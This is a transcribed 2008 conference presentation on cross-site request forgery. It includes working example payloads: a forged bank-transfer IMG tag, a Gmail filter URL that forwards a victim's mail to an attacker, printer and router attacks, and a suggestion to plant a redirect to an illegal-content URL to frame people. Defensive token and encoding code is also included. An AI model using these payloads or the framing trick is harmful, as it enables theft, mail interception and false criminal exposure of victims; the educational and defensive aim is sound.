CSRF_RSA_2008_Jeremiah_Grossman

Cross-Site Request Forgery “The Sleeping Giant of Website Vulnerabilities” Jeremiah Grossman | WhiteHat Security | 04/09/08 | Session Code: HT1-20304


Jeremiah Grossman
– WhiteHat Security Founder & CTO
– Technology R&D and industry evangelist (named to InfoWorld's CTO Top 25 for 2007)
– Frequent international conference speaker
– Co-founder of the Web Application Security Consortium
– Co-author: Cross-Site Scripting Attacks
– Former Yahoo! information security officer

Vulnerability Stack (figure): network and host scanners such as Symantec, Qualys, Nessus and nCircle cover the “well-known” vulnerabilities; WhiteHat Security focuses on “custom web applications”.

Target #1
– 162 million websites
– 809,000+ websites with SSL certificates
– Many are mission-critical and gateways to highly sensitive customer and corporate information
– These websites are accessible by over 1 billion people

Cross-Site Scripting (XSS) - forcing malicious content to be served by a trusted website to an unsuspecting user.

Cross-Site Request Forgery (CSRF) - forcing an unsuspecting user’s browser to send requests they didn’t intend (wire transfer, blog post, etc.).

JavaScript Malware - payload of an XSS or CSRF attack, typically written in JavaScript, and executed in a browser.

The big 3!

What's in a name?

1988 – Confused Deputy: original CSRF theory

2000 – Client-Side Trojans: Zope discovers the Web version of the Confused Deputy

2001 – Cross Site Request Forgery: Peter Watkins discovers Client-Side Trojans, CSRF, pronounces it "sea surf"

2004 – Session Riding: Thomas Schreiber discovers CSRF, writes a white paper, changes the name

2005 – XSRF: Jesse Burns (iSec) writes a white paper, likes this acronym better

2005 – Samy Worm: Web worm infects 1 million MySpace profiles using XSS/CSRF

2006 – Intranet Hacking: WhiteHat Security discovers JavaScript can use CSRF to perform browser port scanning

2007 – MITRE CVE Trends: says CSRF is under-reported and predicts stats increase

2007 – OWASP CSRF: CSRF added as #5 on the OWASP Top Ten project

Cross-Site Request Forgeries, Session Riding, Client-Side Trojans, Confused Deputy, Web Trojans

Confused?


Timeline

2007 – Domain Stealing: CSRF used to hijack Gmail accounts and take control over domain names

2008 – Drive-by-Pharming: CSRF used to target DSL routers and modify their DNS settings for a popular bank in Mexico

How prevalent is CSRF?

No statistics exist, no one can scan for it, and nearly all issues are found by hand.

Ask the Experts

• Just about every important feature of every website is vulnerable.

• Ask MITRE: “Cross-Site Request Forgery (CSRF) remains a ‘sleeping giant’ [Grossman]. CSRF appears very rarely in CVE, less than 0.1% in 2006, but its true prevalence is probably far greater than this. This is in stark contrast to the results found by web application security experts including Jeremiah Grossman, RSnake, Andrew van der Stock, and Jeff Williams. These researchers regularly find CSRF during contract work, noting that it is currently not easy to detect automatically. The dearth of CSRF in CVE suggests that non-contract researchers are simply not investigating this issue. If (and when) researchers begin to focus on this issue, there will likely be a significant increase in CSRF reports.”

• Ask OWASP: “Cross Site Request Forgery (CSRF) is the major new addition to this edition of the OWASP Top 10. Although raw data ranks it at #36, we believe that it is important enough that applications should start protection efforts today, particularly for high value applications and applications which deal with sensitive data. CSRF is more prevalent than its current ranking would indicate, and it can be highly dangerous.”

“...estimated that 51 percent of websites hosting malicious code over the past six months were legitimate destinations that had been hacked, as opposed to sites specifically set up by criminals. Compromised websites can pose a greater risk because they often come with a degree of trust.” – Websense

Getting infected with JavaScript Malware
• Website owner embedded JavaScript malware.
• Web page defaced with embedded JavaScript malware.
• Clicked on a specially-crafted malicious link.
• JavaScript Malware injected into a public area of a website.

The Anatomy of a CSRF Attack

A user is logged in to a Web bank with a “Transfer Funds” feature. After specifying the “From” account, “To” account, and dollar amount, the user clicks the “Continue” button.

Let’s say the “From” account is “314159265,” the “To” account is “011235813,” and we’re transferring $5,000.

The Web browser issues an HTTP request to the Web server executing the process. The form values are located within the POST body and the session credential (Cookie) in the headers. If the request was successful, $5,000 would be transferred from account “314159265” to account “011235813.”

POST http://webbank/transfer_funds.cgi HTTP/1.1
Host: webbank
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O;) Firefox/1.4.1
Cookie: JSPSESSIONID=4353DD35694D47990BCDF36271740A0C

from=314159265&to=011235813&amount=5000&date=11072006

Many Web applications, such as transfer_funds.cgi, do not distinguish between parameters sent using GET or POST. Transfer Funds could be initiated using GET. In Figure 3, the POST method is replaced by GET and the parameters in the HTTP body have been added to the query string.

GET http://webbank/transfer_funds.cgi?from=314159265&to=011235813&amount=5000&date=11072006 HTTP/1.1
Host: webbank
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US;) Firefox/1.4.1
Cookie: JSPSESSIONID=4353DD35694D47990BCDF36271740A0C

Converting POST to GET is not required; JavaScript can issue POSTs through Web Forms.

POST is NOT a Solution

When bank customers are still logged in, they may stumble across a Web page containing the HTML below. A customer may find this link in a phishing email, message board post, instant message spam, etc. The SRC attribute of the IMG tag has a similar URL value to that of Figure 3, but has been updated with another account number.

<IMG SRC=http://webbank/transfer_funds.cgi?from=314159265&to=1618&amount=5000&date=11072006>

The IMG tag forces a “forged” request, and if the customer is still logged in, $5,000 from account “314159265” will be sent to account “1618,” belonging to the hacker. To the online bank the request appears completely legitimate. CSRF attacks succeed because the customer is the one who is actually making the request, and the browser automatically sends the session credentials (cookies) along with it.

The Hack

Can: Force a user to make any HTTP request to anywhere.
Can’t: Read the web page that is returned in the browser.

(Figure: “CSRF Can and Can Not Do” – Same-Origin Policy. A page on attacker.com can read the response to a request sent to attacker.com (Read OK); it can send a forged request to bank.com, but the Same-Origin Policy stops it from reading the response (Read Error).)

Make Someone Buy Now with Amazon 0-Click

1) Attacker creates a web page containing a piece of CSRF exploit code, then waits.

2) When a logged-in Amazon user views the page, the CSRF exploit code silently forces a 1-Click purchase of any product to any “ship to” address.

3) Attacker waits for their loot to arrive.

Force Google Searches

Get something “odd” to show up in a person's search history.


GMail E-mail Hijack Technique

• Victim visits a web page containing JavaScript malware. The JavaScript malware forces the user to make a multipart/form-data form submission to GMail (CSRF).
http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&[email protected]&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter

• If the user is logged in, a filter is entered into the user’s account, which they are unlikely to notice, that forwards all their email to “[email protected]”.

Attacks can penetrate the intranet by controlling/hijacking a user’s browser and using JavaScript Malware, which is on the inside of the network.

Intranet Hacking

Cross-Site Scripting (Printer Spamming)

“By using only JavaScript, an Internet web site can remotely print to an internal network based printer by doing an HTTP Post. The web site initiating the print request can print full text, enter PostScript commands allowing the page to be formatted, and in some cases send faxes. For the attack to succeed the user needs to visit a web site that contains this JavaScript.” - Aaron Weaver

<img src="myprinter:9100/Printed_from_the_web">

Drive-by-Pharming: Intranet Hacking Exploited in the Wild

1. Victim user receives an e-card from an attacker.

2. E-card contains an HTML IMG tag that sends an HTTP GET request to their router, modifying the DNS settings so that the URL for a popular Mexico-based banking site would be mapped to an attacker’s Web site. (Password bypassed)

3. Subsequent visits to the banking website using the same computer would be directed to the attacker’s site, where their credentials would be stolen.

Click A Link, Go To Jail (10 years)

1. FBI posts links claiming to be illegal content of minors having sex on a government controlled server.

2. Anyone who clicks on the links is charged with violating the federal child pornography law and their home is raided.

3. Search warrants have been found to be legal, even though there is no direct evidence of what person behind the IP address clicked the link and no HTTP referer information is captured.

If you want to give someone a really bad day, put something like this in your web pages.

<META HTTP-EQUIV="refresh" CONTENT="0;url=http://child-porn-site">

Consider forcing users from China to access “illegal” content, initiating hacking attempts against government systems, participating in a DDoS attack, etc. The list is endless.

CSRF Solutions (Secrets)

Token
http://server/webapp?token=02c425157ecd32f259548b33402ff6d3a
token = digest(session_id + salt) + salt
salt = 2-byte (at least) random value

Are you sure? Yes or No.
Effectively implemented as the solution above, just another method.

Please enter your password to confirm.
Again, same solution but the user’s password is substituted for the secret token.
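The token scheme on this slide (token = digest(session_id + salt) + salt, checked on every state-changing request), worked through as an added example that is not from the presentation; SHA-256 as the digest, a 16-byte salt, and the transfer_funds handler with its session table are my assumptions:

```python
import hashlib
import hmac
import os
from urllib.parse import parse_qs

# Constructed session store: cookie value -> logged-in user (sample data only).
SESSIONS = {"4353DD35694D47990BCDF36271740A0C": "alice"}
SALT_LEN = 16  # slide requires at least 2 random bytes; 16 makes guessing hopeless


def make_token(session_id, salt=None):
    """token = digest(session_id + salt) + salt, as on the slide (SHA-256 assumed)."""
    salt = os.urandom(SALT_LEN) if salt is None else salt
    digest = hashlib.sha256(session_id.encode() + salt).hexdigest()
    return digest + salt.hex()


def check_token(session_id, token):
    """Split off the salt carried in the token, recompute the digest, compare."""
    digest_len = hashlib.sha256().digest_size * 2          # hex characters
    if len(token) < digest_len + 4:                         # at least a 2-byte salt
        return False
    digest, salt_hex = token[:digest_len], token[digest_len:]
    try:
        salt = bytes.fromhex(salt_hex)
    except ValueError:
        return False
    expected = hashlib.sha256(session_id.encode() + salt).hexdigest()
    return hmac.compare_digest(expected.encode(), digest.encode())  # constant time


def transfer_funds(cookie_header, body):
    """Server side of transfer_funds.cgi: the cookie proves login, the token proves intent."""
    cookies = dict(kv.strip().split("=", 1) for kv in cookie_header.split(";") if "=" in kv)
    session_id = cookies.get("JSPSESSIONID", "")
    if session_id not in SESSIONS:
        return "401 not logged in"
    params = {k: v[0] for k, v in parse_qs(body).items()}
    if not check_token(session_id, params.get("token", "")):
        return "403 missing or invalid CSRF token"
    return f"200 transferred {params['amount']} from {params['from']} to {params['to']}"


if __name__ == "__main__":
    sid = "4353DD35694D47990BCDF36271740A0C"
    # Legitimate submission: the bank's own form page embedded a fresh token for this session.
    print(transfer_funds(f"JSPSESSIONID={sid}",
                         f"from=314159265&to=011235813&amount=5000&token={make_token(sid)}"))
    # Forged <IMG SRC=...> request: the browser adds the cookie, but the attacker has no token.
    print(transfer_funds(f"JSPSESSIONID={sid}", "from=314159265&to=1618&amount=5000"))
```

The attacker's page cannot read the bank's response (Same-Origin Policy), so it can never learn a valid token; the check rejects exactly the cookie-only request the IMG tag produces.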

XSS vulnerabilities bypass all CSRF protections

MySpace (Samy Worm)
First major XSS/CSRF worm
24 hours, 1 million users affected

CROSS-SITE SCRIPTING WORMS AND VIRUSES “The Impending Threat and the Best Defense”

http://www.whitehatsec.com/downloads/WHXSSThreats.pdf

Samy used XSS to bypass CSRF (secret token) protections

Web Worms

1) Logged-in user views Samy’s profile page with embedded JavaScript malware.

2) Malware adds Samy as their friend, updates their profile with “Samy is my hero,” and copies the malware to their profile.

3) People visiting infected profiles are in turn infected, causing exponential growth.

Code Security

Input Validation
• Character-set - Only contain characters you expect to receive.
• Length - Restricted to a minimum and maximum number of bytes.
• Data Format - Data is consistent with what is expected. Phone numbers should look like phone numbers, email addresses should look like email addresses, etc.

XSS Output Filtering (HTML Encoding)

# Encode the characters most often used to break out of an HTML or JavaScript context
$data =~ s/(<|>|\"|\'|\(|\)|:)/'&#'.ord($1).';'/sge;
# Stricter variant: encode every non-word character as a numeric entity
$data =~ s/([^\w])/'&#'.ord($1).';'/sge;
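The two Perl substitutions above, ported to Python as an added example (not the slide's code), with checks that the encoded output carries no tag or attribute delimiter and that a browser decodes it back to the original text; the helper names are mine:

```python
import html
import re

# Characters the first slide regex targets: the HTML/JS context breakers < > " ' ( ) :
TARGETED = re.compile("([<>\"'():])")
# The stricter second regex: every non-word character
NON_WORD = re.compile(r"([^\w])")


def encode_targeted(data):
    r"""Port of: $data =~ s/(<|>|\"|\'|\(|\)|:)/'&#'.ord($1).';'/sge;"""
    return TARGETED.sub(lambda m: f"&#{ord(m.group(1))};", data)


def encode_strict(data):
    r"""Port of: $data =~ s/([^\w])/'&#'.ord($1).';'/sge;"""
    return NON_WORD.sub(lambda m: f"&#{ord(m.group(1))};", data)


def is_inert(encoded):
    """True when no tag or attribute delimiter survives, so an HTML parser sees only text."""
    return not any(c in encoded for c in "<>\"'")


def round_trips(data, encoder):
    """Numeric entities are decoded by the browser, so the visible text is unchanged."""
    return html.unescape(encoder(data)) == data


if __name__ == "__main__":
    # Constructed sample of untrusted input echoed into a page (typical stored-XSS payload shape).
    sample = '<img src=x onerror=alert(1)>'
    print(encode_targeted(sample), is_inert(encode_targeted(sample)))
    print(encode_strict(sample), round_trips(sample, encode_strict))
```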

Web Browser Security

• Stay patched and install browser add-ons – NoScript, SafeHistory, CustomizeGoogle, Adblock Plus, Netcraft Toolbar, and the eBay Toolbar.

• Log out of websites when work is completed, especially the sensitive ones.

• Be suspicious of long links, most importantly those containing HTML code. Best to type the domain name manually into your browser location bar.

• Disable Java, Flash, and ActiveX prior to visiting questionable websites. Can’t really disable JavaScript anymore.

• Surf with two Web browsers – the primary is used for everyday surfing only. The secondary is used for “important” business only – use bookmarks, log in, do your work, log out, and exit.

• VMware Web surfing for the paranoid. If anything bad should happen, the local machine and data remain safe.

For more information visit: www.whitehatsec.com

Jeremiah Grossman, founder and CTO
blog: http://jeremiahgrossman.blogspot.com
email: [email protected]

Thank You!

References

The Cross-Site Request Forgery (CSRF/XSRF) FAQ
http://www.cgisecurity.com/articles/csrf-faq.shtml

The Confused Deputy - Original Cross-Site Request Forgery Theory
http://www.cap-lore.com/CapTheory/ConfusedDeputy.html

Zope discovers a Web version of the Confused Deputy, calls it Client-Side Trojans
http://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan

Peter Watkins discovers Client-Side Trojans, calls it CSRF (pronounced "sea surf")
http://www.tux.org/~peterw/csrf.txt

Thomas Schreiber discovers CSRF, doesn't like the name, calls it Session Riding
http://www.securenet.de/papers/Session_Riding.pdf

Jesse Burns discovers CSRF, doesn't like the acronym, changes it to XSRF
http://www.isecpartners.com/files/XSRF_Paper_0.pdf

Intranet Hacking from the Outside and JavaScript Port Scanning
http://jeremiahgrossman.blogspot.com/2006/09/video-hacking-intranet-websites-from.html

MITRE - Vulnerability Type Distributions in CVE
http://cve.mitre.org/docs/vuln-trends/index.html

OWASP Top Ten 2007
http://www.owasp.org/index.php/Top_10_2007-A5